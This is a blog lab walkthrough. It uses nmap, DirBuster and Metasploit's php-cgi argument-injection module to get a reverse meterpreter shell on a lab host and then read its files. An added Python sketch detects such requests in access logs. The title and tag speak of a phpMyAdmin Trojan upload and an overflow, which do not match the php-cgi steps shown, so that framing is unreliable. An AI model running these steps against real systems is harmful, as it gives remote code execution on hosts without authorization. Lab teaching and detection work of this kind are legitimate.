Use a phpMyAdmin vulnerability to upload a Trojan horse program and get a webshell.
The CGI script does not properly handle request parameters, which leaks the source code and allows a remote attacker to insert commands to be executed into the request parameters.
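On the defensive side, requests of this kind can be spotted in web server access logs. The following detection sketch is an added example, not part of the original article; the sample log lines and the helper names `cgi_args` and `suspicious_requests` are constructed for illustration, and it assumes logs in the common/combined format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original article).
SAMPLE_LOG = """\
192.168.1.2 - - [09/Dec/2016:10:00:01 +0800] "GET /index.php?-s HTTP/1.1" 200 5120
192.168.1.2 - - [09/Dec/2016:10:00:05 +0800] "POST /index.php?%2Dd+example_directive%3D1 HTTP/1.1" 200 312
192.168.1.7 - - [09/Dec/2016:10:01:12 +0800] "GET /index.php?page=-1 HTTP/1.1" 200 2048
192.168.1.7 - - [09/Dec/2016:10:01:15 +0800] "GET /search.php?a-b+c HTTP/1.1" 200 900
192.168.1.7 - - [09/Dec/2016:10:01:20 +0800] "GET /phpMyAdmin/index.php HTTP/1.1" 200 8192
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def cgi_args(target):
    """Return the arguments a CGI binary would receive from this request
    target, or [] when the query is ordinary form data."""
    _, sep, query = target.partition("?")
    # CGI passes the query as command-line arguments only when it contains
    # no unencoded "="; "+" separates arguments, each then URL-decoded.
    if not sep or not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]

def suspicious_requests(log_text):
    """Return (client_ip, target, args) for requests where any decoded
    argument starts with "-", i.e. would be read as an interpreter option."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = cgi_args(m.group("target"))
        if any(a.startswith("-") for a in args):
            hits.append((m.group("ip"), m.group("target"), args))
    return hits

if __name__ == "__main__":
    for ip, target, args in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {target} -> {args}")
```

Ordinary parameters such as `page=-1` are not flagged because a query containing a literal `=` is never passed as arguments; an encoded `%3D` does not count as one, which is why the second sample line is still caught.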
1. Scanning the target host with Nmap
1.1 Use the nmap command to scan the target host. Click on the left side of the desktop and select "Open in Terminal" in the context menu.
1.2 Enter the command "nmap -sV 192.168.1.3" in the terminal to port-scan the target host; port 80 is found to be open.
1.3 Enter "http://192.168.1.3" in the browser address bar to access the target site.
2. Scanning the target host with DirBuster
2.1 Enter the command "dirbuster" in the terminal to launch the software and scan the target website.
2.2 Enter "192.168.1.3" as the target URL, select a dictionary file (under the /usr/share/dirbuster/wordlists/ directory) at "File with list of dirs/files", and click the "Start" button to start the scan.
2.3 The scan results show the cgi-bin directory, the phpMyAdmin directory, and so on.
3. Attacking the target host with Metasploit
3.1 Enter the command "msfconsole" in the terminal to launch the MSF console.
3.2 Enter the command "search php_cgi" in the terminal to search for php_cgi related modules and payloads.
3.3 Enter the command "use exploit/multi/http/php_cgi_arg_injection" in the terminal to enable the exploit module; the prompt then shows that you have entered that module path.
3.4 Enter the command "show payloads" in the terminal to list the Metasploit payloads, that is, the code (shellcode) that can be executed on the remote host.
3.5 Enter the command "set PAYLOAD php/meterpreter/reverse_tcp" in the terminal to set the shellcode to use.
3.6 Enter "show options" in the terminal to show the parameters that the attack module needs to have set.
3.7 Enter "set LHOST 192.168.1.2" in the terminal to set the IP address of the source host for the session's reverse connection.
3.8 Enter "set RHOST 192.168.1.3" in the terminal to set the IP of the target host.
3.9 Enter "exploit" in the terminal to start attacking the target host.
3.10 Enter "sysinfo" in the terminal to view system environment information.
3.11 Enter "ls" in the terminal to list the files in the current directory.
3.12 Enter "cat phpinfo.php" in the terminal to view the contents of the file.
This article is from the "12377962" blog, please be sure to keep this source http://12387962.blog.51cto.com/12377962/1881881
Metasploit Overflow phpMyAdmin Vulnerability